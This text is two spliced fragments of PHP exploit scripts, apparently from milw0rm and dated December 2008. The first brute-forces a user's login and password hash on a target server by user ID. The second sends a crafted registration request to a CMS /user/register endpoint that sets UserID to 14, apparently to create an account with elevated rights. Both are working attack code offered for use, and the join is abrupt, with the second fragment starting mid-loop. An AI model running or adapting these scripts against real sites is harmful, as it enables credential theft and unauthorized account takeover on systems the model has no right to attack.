} else {
$ARG = array();
foreach ($argv as $arg) {
if (strpos($arg, '-') === 0) {
$key = substr($arg, 1, 1);
if (!isset($ARG[$key])) {
$ARG[$key] = substr($arg, 3, strlen($arg));
}
}
}
if ($ARG[s] && $ARG[u]) {
$server = $ARG[s];
$User_id = intval($ARG[u]);
$User_id--;
print "[+] Phase 1 brute login.\n";
$login = brute($User_id, "Login");
print "\n[+] Phase 1 successfully finished: {$login}\n";
print "[+] Phase 2 brute password-hash.\n";
$hash = brute($User_id, "Password");
print "\n[+] Phase 2 successfully finished: {$hash}\n";
successfully($login, $hash);
} else {
help_argc($argv[0]);
exit(0);
}
}
?>
# milw0rm.com [2008-12-23]
$key = substr($arg, 1, 1);
if (!isset($ARG[$key])) {
$ARG[$key] = substr($arg, 3, strlen($arg));
}
}
}
if ($ARG[u] && $ARG[p] && $ARG[e] && $ARG[s]) {
$post_fields = array('ContentObjectAttribute_data_user_login_30' => $ARG[u], 'ContentObjectAttribute_data_user_password_30' => $ARG[p], 'ContentObjectAttribute_data_user_password_confirm_30' => $ARG[p], 'ContentObjectAttribute_data_user_email_30' => $ARG[e], 'UserID' => '14', 'PublishButton' => '1');
$headers = array('User-Agent' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14', 'Referer' => $ARG[s]);
$res_http = new HttpRequest($ARG[s] . "/user/register", HttpRequest::METH_POST);
$res_http->addPostFields($post_fields);
$res_http->addHeaders($headers);
try {
$response = $res_http->send()->getBody();
if (eregi("success", $response)) {
successfully($ARG[u], $ARG[p]);
} else {
print "[-] Exploit failed";
}
} catch (HttpException $exception) {
print "[-] Not connected";
exit(0);
}
} else {
help_argc($argv[0]);
exit(0);
}
}
?>
# milw0rm.com [2008-12-10]
